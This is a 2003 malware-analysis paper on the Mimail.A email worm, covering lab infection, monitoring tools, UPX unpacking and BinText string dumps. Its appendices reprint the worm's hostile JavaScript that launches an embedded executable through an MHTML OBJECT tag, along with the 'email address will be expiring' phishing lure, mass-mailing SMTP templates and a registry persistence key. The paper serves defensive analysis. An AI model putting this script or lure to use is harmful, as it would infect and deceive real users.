ISW Security Papers Contest
 
A Closer Look at the Worm_Mimail.A by Charles Hornat on 13/09/03

Overview

On August 1, 2003, I encountered several emails from my email admin account informing me that my email address will be expiring and that I should read an attachment for further details. Being suspicious, I analyzed that file and the affects of it. This is a short overview of what I have found so far.


Table of Contents


The Delivery

This particular infection comes in the form of an email and requires users to open the email, unzip an html file, and launch it in Internet Explorer. Figure 1 is a snapshot of that email.

Figure 1:email message


The Tools 

Each description is taken from the vendor for your reference.

BinText
A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.

Vendor: Foundstone

URL: http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/bintext.htm

TDIMON
TDImon is an application that lets you monitor TCP and UDP activity on your local system. It is the most powerful tool available for tracking down network-related configuration problems and analyzing application network usage.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/freeware/tdimon.shtml

Regmon
Regmon is a Registry monitoring utility that will show you which applications are accessing your Registry, which keys they are accessing, and the Registry data that they are reading and writing - all in real-time. This advanced utility takes you one step beyond what static Registry tools can do, to let you see and understand exactly how programs use the Registry. With static tools you might be able to see what Registry values and keys changed. With Regmon you'll see how the values and keys changed.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/source/regmon.shtml

Filemon
Filemon monitors and displays file system activity on a system in real-time. Its advanced capabilities make it a powerful tool for exploring the way Windows works, seeing how applications use the files and DLLs, or tracking down problems in system or application file configurations. Filemon's timestamping feature will show you precisely when every open, read, write or delete, happens, and its status column tells you the outcome. Filemon is so easy to use that you'll be an expert within minutes. It begins monitoring when you start it, and its output window can be saved to a file for off-line viewing. It has full search capability, and if you find that you're getting information overload, simply set up one or more filters.

Vendor: Sysinternal

URL: http://www.sysinternals.com/ntw2k/source/filemon.shtml

Regshot
Regshot allows you to take a snapshot of the registry, save it, perform what ever tasks you like, and take another snapshot. The value in this little application is that you can compare the shots taken, before and after, and analyze the differences. 

Vendor: regshot.ist.md

URL: http://regshot.ist.md/

UPX
UPX is a free, portable, extendable, high-performance executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. Your executables suffer no memory overhead or other drawbacks.

Vendor: UPX

URL: http://upx.sourceforge.net/


Preparation

A default Windows XP system running inside VMWare environment was used as the test lab. Regomon, Filemon, TDI were started and left running before infection. A registry snapshot was taken using Regshot. Once this was complete, and a quick look at the processes running on the system


Infection

The email was opened, the zip file was unzipped, and the HTML file was double clicked. Figure 2 is a screen shot of the html page. Note the bottom information bar indicating something is happening.

Figure 2: Screen Shot of Installation

During the installation, a process called ‘Videodrv.exe’ can be seen running. 

Figure 3:Videodrv.exe

After about 5 minutes, an error message appeared on the screen. The error message can be seen in Figure 4.

Figure 4:Error Message

When this error message occurred, the HTML window message that commented on installing the components disappeared, hinting that the application was complete.

There were no other visible instances that the system had been infected.


A Closer look at HTML

Running Bintext or simply opening the HTML file in an editor produced some readable lines of instructions, but for the most part, was encrypted. Some key lines that were visible included:

  • Content-Location:File://foo.exe 
  • Content-Transfer-Encoding: binary 
  • document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>') 
    Take note of the file foo.exe and “moo ha ha” lines. Are these important? Appendix A is a complete BINTEXT of the HTML file in its original format. 


What is Videodrv.exe

When the virus was launched, there was a process called videodrv.exe. A closer look at the process could reveal additional information and can be seen in Figure 4.

Figure 4:videodrv.exe 2

Regshot was able to identify the following changes between the scan before infection, and the scan after:

C:\WINDOWS\exe.tmp

C:\WINDOWS\videodrv.exe

C:\WINDOWS\zip.tmp

This identifies 3 new files added to the target system that we can examine in more detail. The Videodrv file was the primary file as seen in Process Explorer. Running Bintext on the executable displayed a lot of un-intelligible garbage. The file was obviously encrypted as well.

UPX is the next tool that was used to try and decrypt the executable and hopefully reveal the inner workings of this executable and the infection. UPX was successful in decrypting the executable! So now we ran Bintext against it again and got a clear view of the application. For a clear view of the text, see Appendix B.

In the text, we could identify the following:

Software\Microsoft\Windows\CurrentVersion\Run\videodrv.exe 
\eml.tmp 
\exe.tmp 
\zip.tmp 
212.5.86.163 
The final point of this analysis is the identifying of the email text we saw in the original email that started the investigation.

0000589D 00474A9D 0 From: %s

000058A6 00474AA6 0 To: %s

000058AD 00474AAD 0 Reply-To: %s

000058C2 00474AC2 0 RCPT TO:<%s>

000058D1 00474AD1 0 MAIL FROM:<%s>

000058E2 00474AE2 0 HELO localhost

000058F7 00474AF7 0 admin@

000058FE 00474AFE 0 ----------%s

0000590B 00474B0B 0 %.8X%.8X

00005914 00474B14 0 X-Mailer: The Bat! (v1.61)

0000592F 00474B2F 0 X-Priority: 2 (High)

00005944 00474B44 0 Subject: your account %s

00005975 00474B75 0 MIME-Version: 1.0

00005987 00474B87 0 Content-Type: multipart/mixed; boundary="%s"

000059BA 00474BBA 0 Content-Type: text/plain; charset=us-ascii

000059E5 00474BE5 0 Content-Transfer-Encoding: 7bit

00005A07 00474C07 0 Hello there,

00005A15 00474C15 0 I would like to inform you about important information regarding your

00005A5B 00474C5B 0 email address. This email address will be expiring.

00005A8F 00474C8F 0 Please read attachment for details.

00005AB8 00474CB8 0 Best regards, Administrator

00005ADD 00474CDD 0 Content-Type: application/x-zip-compressed; name="message.zip"

00005B1C 00474D1C 0 Content-Transfer-Encoding: base64

00005B3E 00474D3E 0 Content-Disposition: attachment; filename="message.zip"

00005B7B 00474D7B 0 --%s—

Further analysis will be completed at a later date!


Appendix A

File pos Mem pos ID Text

======== ======= == ====

00000000 00000000 0 MIME-Version: 1.0

00000012 00000012 0 Content-Location:File://foo.exe

00000032 00000032 0 Content-Transfer-Encoding: binary

000000A2 000000A2 0 !This program cannot be run in DOS mode.

00000340 00000340 0 /t:VU

00000354 00000354 0 (x1%Sr

00000663 00000663 0 [vxf.

000007DE 000007DE 0 u#);sG

00000892 00000892 0 dgeQW

0000096E 0000096E 0 KF8"t!*

0000097E 0000097E 0 H1!9lF

00000AAE 00000AAE 0 =aS S

00000D85 00000D85 0 X= c%

00000DAF 00000DAF 0 N \$(S#

00001034 00001034 0 {*_h 

00001074 00001074 0 W 7C3

0000120D 0000120D 0 $2V)mXl!

0000165F 0000165F 0 J xA xo

00001684 00001684 0 f t|0

000016E8 000016E8 0 nw7Gm

0000171D 0000171D 0 , 'QG

00001947 00001947 0 }f@'WY

00001982 00001982 0 SJ6]@

0000199A 0000199A 0 (sdsC

00001A80 00001A80 0 14,Q/

00001BE7 00001BE7 0 <Ar'<

00001BF5 00001BF5 0 <\t.<

00001C27 00001C27 0 kNAlS;!v$k

00001D36 00001D36 0 XY@6n

00001E56 00001E56 0 2 (,2 

00001F48 00001F48 0 ABCDEFG

00001F53 00001F53 0 HIJKLMNOPQRSTUVWXYZabcdefghijklm

00001F77 00001F77 0 nopqrstuvwxyz0123456789+/

00001F91 00001F91 0 awerio

00001F9D 00001F9D 0 pasafihokozavbnmc@

00001FB3 00001FB3 0 oe.aea7

00001FCA 00001FCA 0 SOKGC

00001FD3 00001FD3 0 ?;73/M

00001FDA 00001FDA 0 4M+'#

00001FE7 00001FE7 0 v@.15

00001FF1 00001FF1 0 <body bgcolor=black scr

00002012 00002012 0 <SCRIPT

0000201A 0000201A 0 funct

00002025 00002025 0 malw

00002031 00002031 0 s=document.URL

00002045 00002045 0 th=s.subcr(-0,

0000205D 0000205D 0 xOf("\\"));

0000206D 0000206D 0 -NefapG

00002087 00002087 0 tle>M&Hge</

000020A2 000020A2 0 FONT f

000020A9 000020A9 0 e="AG

000020E8 000020E8 0 t-0ze

000020EE 000020EE 0 2px;">Num

000020FF 000020FF 0 wOBJECT

00002114 00002114 0 &-hair

00002128 00002128 0 CLASSID

00002148 00002148 0 nEJhtml:'+=+'X

00002177 00002177 0 }etTi/o

00002190 00002190 0 [ipt>

00002196 00002196 0 MIME-V

File pos Mem pos ID Text

======== ======= == ====

0000219D 0000219D 0 s) 1.0

000021B6 000021B6 0 Transf9-

000021D2 000021D2 0 VidyDav

000021DF 000021DF 0 on}\Mi*n

000021EB 000021EB 0 \Wxows\CArJ

000021FF 000021FF 0 \v:drvk

0000220B 0000220B 0 =C:\P5gkm 

0000223E 0000223E 0 \e%.)

00002249 00002249 0 xezipRegis

00002267 00002267 0 l32.dw

00002273 00002273 0 apd 5]n

00002281 00002281 0 '%s'WF-m

00002295 00002295 0 6Nply-

000022C8 000022C8 0 MXbDa

000022E6 000022E6 0 LINEw1

00002337 00002337 0 \ShGl

00002350 00002350 0 45-3li

00002382 00002382 0 psh[h

00002388 00002388 0 [Lx"x

000023BD 000023BD 0 5.8636<2

000023CF 000023CF 0 5QUIT

000023E4 000023E4 0 GDATA$RCP-{

00002404 00002404 0 HELO 

0000242F 0000242F 0 B6! (v

000024A5 000024A5 0 iiM7b

000024DF 000024DF 0 Y;gxfh

00002564 00002564 0 64!D{ 

000025F1 000025F1 0 hXZl+

0000261F 0000261F 0 <HPU;\

0000265F 0000265F 0 (8DP\p4M

000026A8 000026A8 0 ,8DA$

000026B5 000026B5 0 BJvvc

000026BC 000026BC 0 U6p"4LG

000026D6 000026D6 0 fF}bH

000026DF 000026DF 0 q+VdH

000026F4 000026F4 0 nGCa(

0000271A 0000271A 0 wK[FC

00002722 00002722 0 Jz/I7@

00002744 00002744 0 +{RA7ZT

00002751 00002751 0 [+LWOD@.

000027BF 000027BF 0 ToDosDat

000027E3 000027E3 0 GetCom

000027FE 000027FE 0 H ?Cll

00002832 00002832 0 Yopymv

00002850 00002850 0 tlUn

0000288A 0000288A 0 EnumValuwg

000028A5 000028A5 0 S?']A2

000028B0 000028B0 0 _KMgth

000028DC 000028DC 0 .Ppctf

000028F4 000028F4 0 cp,r[

00002910 00002910 0 <ymppy

0000291C 0000291C 0 n(n!n"

00002958 00002958 0 sPs2KL"

000029E6 000029E6 0 WSAnLZ

00002A12 00002A12 0 [hton

00002D6D 00002D6D 0 KERNEL32.DLL

00002D7A 00002D7A 0 ADVAPI32.DLL

00002D87 00002D87 0 CRTDLL.DLL

00002D92 00002D92 0 GDI32.DLL

00002D9C 00002D9C 0 iphlpapi.DLL

File pos Mem pos ID Text

======== ======= == ====

00002DA9 00002DA9 0 ole32.DLL

00002DB3 00002DB3 0 OLEAUT32.DLL

00002DC0 00002DC0 0 USER32.DLL

00002DCB 00002DCB 0 wsock32.dll

00002DD9 00002DD9 0 LoadLibraryA

00002DE7 00002DE7 0 GetProcAddress

00002DF7 00002DF7 0 ExitProcess

00002E05 00002E05 0 RegCloseKey

00002E19 00002E19 0 GetStockObject

00002E29 00002E29 0 GetNetworkParams

00002E3B 00002E3B 0 CoInitialize

00002E49 00002E49 0 SysAllocString

00002E59 00002E59 0 SetTimer

00003075 00003075 0 <body bgcolor=black scroll=no>

00003094 00003094 0 <SCRIPT>

0000309D 0000309D 0 function malware()

000030B2 000030B2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000030E8 000030E8 0 path=unescape(path);

000030FD 000030FD 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003267 00003267 0 setTimeout("malware()",150)

00003284 00003284 0 </script><body bgcolor=black scroll=no>

000032AC 000032AC 0 <SCRIPT>

000032B5 000032B5 0 function malware()

000032CA 000032CA 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003300 00003300 0 path=unescape(path);

00003315 00003315 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000347F 0000347F 0 setTimeout("malware()",150)

0000349C 0000349C 0 </script><body bgcolor=black scroll=no>

000034C4 000034C4 0 <SCRIPT>

000034CD 000034CD 0 function malware()

000034E2 000034E2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003518 00003518 0 path=unescape(path);

0000352D 0000352D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003697 00003697 0 setTimeout("malware()",150)

000036B4 000036B4 0 </script><body bgcolor=black scroll=no>

000036DC 000036DC 0 <SCRIPT>

000036E5 000036E5 0 function malware()

000036FA 000036FA 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003730 00003730 0 path=unescape(path);

00003745 00003745 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000038AF 000038AF 0 setTimeout("malware()",150)

000038CC 000038CC 0 </script><body bgcolor=black scroll=no>

000038F4 000038F4 0 <SCRIPT>

000038FD 000038FD 0 function malware()

00003912 00003912 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003948 00003948 0 path=unescape(path);

0000395D 0000395D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003AC7 00003AC7 0 setTimeout("malware()",150)

00003AE4 00003AE4 0 </script><body bgcolor=black scroll=no>

00003B0C 00003B0C 0 <SCRIPT>

00003B15 00003B15 0 function malware()

00003B2A 00003B2A 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003B60 00003B60 0 path=unescape(path);

00003B75 00003B75 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003CDF 00003CDF 0 setTimeout("malware()",150)

00003CFC 00003CFC 0 </script><body bgcolor=black scroll=no>

00003D24 00003D24 0 <SCRIPT>

00003D2D 00003D2D 0 function malware()

00003D42 00003D42 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003D78 00003D78 0 path=unescape(path);

File pos Mem pos ID Text

======== ======= == ====

00003D8D 00003D8D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003EF7 00003EF7 0 setTimeout("malware()",150)

00003F14 00003F14 0 </script><body bgcolor=black scroll=no>

00003F3C 00003F3C 0 <SCRIPT>

00003F45 00003F45 0 function malware()

00003F5A 00003F5A 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003F90 00003F90 0 path=unescape(path);

00003FA5 00003FA5 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000410F 0000410F 0 setTimeout("malware()",150)

0000412C 0000412C 0 </script><body bgcolor=black scroll=no>

00004154 00004154 0 <SCRIPT>

0000415D 0000415D 0 function malware()

00004172 00004172 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000041A8 000041A8 0 path=unescape(path);

000041BD 000041BD 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00004327 00004327 0 setTimeout("malware()",150)

00004344 00004344 0 </script><body bgcolor=black scroll=no>

0000436C 0000436C 0 <SCRIPT>

00004375 00004375 0 function malware()

0000438A 0000438A 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000043C0 000043C0 0 path=unescape(path);

000043D5 000043D5 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000453F 0000453F 0 setTimeout("malware()",150)

0000455C 0000455C 0 </script><body bgcolor=black scroll=no>

00004584 00004584 0 <SCRIPT>

0000458D 0000458D 0 function malware()

000045A2 000045A2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000045D8 000045D8 0 path=unescape(path);

000045ED 000045ED 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00004757 00004757 0 setTimeout("malware()",150)

00004774 00004774 0 </script><body bgcolor=black scroll=no>

0000479C 0000479C 0 <SCRIPT>

000047A5 000047A5 0 function malware()

000047BA 000047BA 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000047F0 000047F0 0 path=unescape(path);

00004805 00004805 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000496F 0000496F 0 setTimeout("malware()",150)

0000498C 0000498C 0 </script><body bgcolor=black scroll=no>

000049B4 000049B4 0 <SCRIPT>

000049BD 000049BD 0 function malware()

000049D2 000049D2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00004A08 00004A08 0 path=unescape(path);

00004A1D 00004A1D 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00004B87 00004B87 0 setTimeout("malware()",150)

00004BA4 00004BA4 0 </script>
Appendix B

File pos Mem pos ID Text

======== ======= == ====

0000004D 0040004D 0 !This program cannot be run in DOS mode.

00000178 00400178 0 .text

000001C8 004001C8 0 .data

000001F0 004001F0 0 .idata

0000044A 0040104A 0 t ;t$$t

0000047D 0040107D 0 SVWUj

00001E4D 00402A4D 0 <>.u"

000026FB 004032FB 0 Wh<IG

000040AA 00404CAA 0 9=0y@

0000470B 0040530B 0 s3A<-t

00004722 00405322 0 <Ar'<

00004730 00405330 0 <\t.<

0000477D 0040537D 0 v$<-t

00004787 00405387 0 <0r><9v

0000478F 0040538F 0 <Ar6<[r

0000479D 0040539D 0 t*<zv

00004829 00405429 0 <@t%<.u

0000486B 0040546B 0 tn;t$

000049B1 004055B1 0 ?"u#j"

00004E5A 0047405A 0 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

00004E9B 0047409B 0 aweriouiopasafihokozavbnmcabcdefghijklmnopqrstuvwxyzoeioaearieao

0000532C 0047452C 0 abcdefghijklmnopqrstuvwxyz@.15

0000534C 0047454C 0 <body bgcolor=black scroll=no>

0000536B 0047456B 0 <SCRIPT>

00005374 00474574 0 function malware()

00005389 00474589 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000053BF 004745BF 0 path=unescape(path);

000053D4 004745D4 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000553E 0047473E 0 setTimeout("malware()",150)

0000555B 0047475B 0 </script>

00005565 00474765 0 MIME-Version: 1.0

00005577 00474777 0 Content-Location:File://foo.exe

00005597 00474797 0 Content-Transfer-Encoding: binary

000055BB 004747BB 0 VideoDriver

000055C7 004747C7 0 Software\Microsoft\Windows\CurrentVersion\Run

000055F5 004747F5 0 \videodrv.exe

00005605 00474805 0 C:\Program Files\

00005617 00474817 0 www.google.com

0000562A 0047482A 0 Error creating window

00005641 00474841 0 \eml.tmp

0000564A 0047484A 0 \exe.tmp

00005653 00474853 0 \zip.tmp

0000565C 0047485C 0 RegisterServiceProcess

00005673 00474873 0 kernel32.dll

00005680 00474880 0 Failed to connect: '%s'

00005699 00474899 0 From: %s

000056A2 004748A2 0 To: <%s>

000056AB 004748AB 0 Reply-To: <%s>

000056BA 004748BA 0 Subject: %s

000056C8 004748C8 0 %s %d

000056CE 004748CE 0 hostent() error: %d

000056E3 004748E3 0 Lookup failed

000056F2 004748F2 0 MX: '%s'

000056FC 004748FC 0 Domain: '%s'

0000570A 0047490A 0 c:\tmpe.tmp

00005724 00474924 0 LINE %d

0000572D 0047492D 0 Line %d: %s

0000578A 0047498A 0 Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

000057CB 004749CB 0 Failed to open '%s'

000057E0 004749E0 0 Memory allocation error, file %s, size %d

File pos Mem pos ID Text

======== ======= == ====

0000580B 00474A0B 0 Read error

00005873 00474A73 0 212.5.86.163

0000589D 00474A9D 0 From: %s

000058A6 00474AA6 0 To: %s

000058AD 00474AAD 0 Reply-To: %s

000058C2 00474AC2 0 RCPT TO:<%s>

000058D1 00474AD1 0 MAIL FROM:<%s>

000058E2 00474AE2 0 HELO localhost

000058F7 00474AF7 0 admin@

000058FE 00474AFE 0 ----------%s

0000590B 00474B0B 0 %.8X%.8X

00005914 00474B14 0 X-Mailer: The Bat! (v1.61)

0000592F 00474B2F 0 X-Priority: 2 (High)

00005944 00474B44 0 Subject: your account %s

00005975 00474B75 0 MIME-Version: 1.0

00005987 00474B87 0 Content-Type: multipart/mixed; boundary="%s"

000059BA 00474BBA 0 Content-Type: text/plain; charset=us-ascii

000059E5 00474BE5 0 Content-Transfer-Encoding: 7bit

00005A07 00474C07 0 Hello there,

00005A15 00474C15 0 I would like to inform you about important information regarding your

00005A5B 00474C5B 0 email address. This email address will be expiring.

00005A8F 00474C8F 0 Please read attachment for details.

00005AB8 00474CB8 0 Best regards, Administrator

00005ADD 00474CDD 0 Content-Type: application/x-zip-compressed; name="message.zip"

00005B1C 00474D1C 0 Content-Transfer-Encoding: base64

00005B3E 00474D3E 0 Content-Disposition: attachment; filename="message.zip"

00005B7B 00474D7B 0 --%s--

00005B89 00474D89 0 message.html

0000605A 0047545A 0 SysAllocString

0000606E 0047546E 0 CoCreateInstance

00006082 00475482 0 CLSIDFromString

00006096 00475496 0 CoInitialize

000060A6 004754A6 0 CoUninitialize

000060BA 004754BA 0 WSAGetLastError

000060CE 004754CE 0 WSAStartup

000060DE 004754DE 0 closesocket

000060EE 004754EE 0 connect

000060FA 004754FA 0 gethostbyname

0000610A 0047550A 0 htons

00006112 00475512 0 inet_addr

0000611E 0047551E 0 ioctlsocket

0000612E 0047552E 0 ntohs

0000613E 0047553E 0 select

00006152 00475552 0 socket

0000615E 0047555E 0 GetNetworkParams

00006172 00475572 0 FileTimeToDosDateTime

0000618A 0047558A 0 FindFirstFileA

0000619E 0047559E 0 FindNextFileA

000061AE 004755AE 0 FormatMessageA

000061C2 004755C2 0 GetCommandLineA

000061D6 004755D6 0 GetFileSize

000061E6 004755E6 0 GetModuleHandleA

000061FA 004755FA 0 CloseHandle

0000620A 0047560A 0 GetProcAddress

0000621E 0047561E 0 GetSystemTimeAsFileTime

0000623A 0047563A 0 GetTickCount

0000624A 0047564A 0 GetWindowsDirectoryA

00006262 00475662 0 CopyFileA

0000626E 0047566E 0 LoadLibraryA

0000627E 0047567E 0 CreateFileA

File pos Mem pos ID Text

======== ======= == ====

0000628E 0047568E 0 ReadFile

0000629A 0047569A 0 RtlUnwind

000062A6 004756A6 0 RtlZeroMemory

000062B6 004756B6 0 Sleep

000062BE 004756BE 0 TerminateThread

000062D2 004756D2 0 WinExec

000062DE 004756DE 0 CreateThread

000062EE 004756EE 0 DeleteFileA

000062FE 004756FE 0 GetWindowTextA

00006312 00475712 0 GetForegroundWindow

0000632A 0047572A 0 LoadCursorA

0000633A 0047573A 0 LoadIconA

00006346 00475746 0 SetTimer

00006352 00475752 0 KillTimer

0000635E 0047575E 0 RegisterClassA

00006372 00475772 0 MessageBoxA

00006382 00475782 0 GetMessageA

00006392 00475792 0 TranslateMessage

000063A6 004757A6 0 DispatchMessageA

000063BA 004757BA 0 PostQuitMessage

000063CE 004757CE 0 CreateWindowExA

000063E2 004757E2 0 DefWindowProcA

000063F6 004757F6 0 GetStockObject

0000640A 0047580A 0 RegEnumValueA

0000641A 0047581A 0 RegCloseKey

0000642A 0047582A 0 RegOpenKeyA

0000643A 0047583A 0 RegSetValueExA

0000644E 0047584E 0 _filelength

0000645E 0047585E 0 _fileno

0000646A 0047586A 0 __GetMainArgs

00006482 00475882 0 fclose

0000648E 0047588E 0 fgets

00006496 00475896 0 fopen

0000649E 0047589E 0 fprintf

000064AA 004758AA 0 fread

000064BA 004758BA 0 fwrite

000064C6 004758C6 0 malloc

000064D2 004758D2 0 memcpy

000064DE 004758DE 0 printf

000064EA 004758EA 0 raise

000064F2 004758F2 0 signal

000064FE 004758FE 0 sprintf

0000650A 0047590A 0 strcat

00006516 00475916 0 strchr

00006522 00475922 0 strcmp

0000652E 0047592E 0 strcpy

0000653A 0047593A 0 strlen

00006546 00475946 0 strncat

00006552 00475952 0 strncmp

0000655E 0047595E 0 strncpy

00006567 00475967 0 AOLEAUT32.DLL

0000657C 0047597C 0 ole32.DLL

00006598 00475998 0 wsock32.dll

000065D8 004759D8 0 iphlpapi.DLL

000065E6 004759E6 0 y0<PG

000065EC 004759EC 0 KERNEL32.DLL

000065FA 004759FA 0 WePPG

00006658 00475A58 0 USER32.DLL

0000669C 00475A9C 0 GDI32.DLL

000066AC 00475AAC 0 ADVAPI32.DLL

File pos Mem pos ID Text

======== ======= == ====

000066CC 00475ACC 0 CRTDLL.DLL

00006820 00406820 0 <body bgcolor=black scroll=no>

0000683F 0040683F 0 <SCRIPT>

00006848 00406848 0 function malware()

0000685D 0040685D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006893 00406893 0 path=unescape(path);

000068A8 004068A8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006A12 00406A12 0 setTimeout("malware()",150)

00006A2F 00406A2F 0 </script><body bgcolor=black scroll=no>

00006A57 00406A57 0 <SCRIPT>

00006A60 00406A60 0 function malware()

00006A75 00406A75 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006AAB 00406AAB 0 path=unescape(path);

00006AC0 00406AC0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006C2A 00406C2A 0 setTimeout("malware()",150)

00006C47 00406C47 0 </script><body bgcolor=black scroll=no>

00006C6F 00406C6F 0 <SCRIPT>

00006C78 00406C78 0 function malware()

00006C8D 00406C8D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006CC3 00406CC3 0 path=unescape(path);

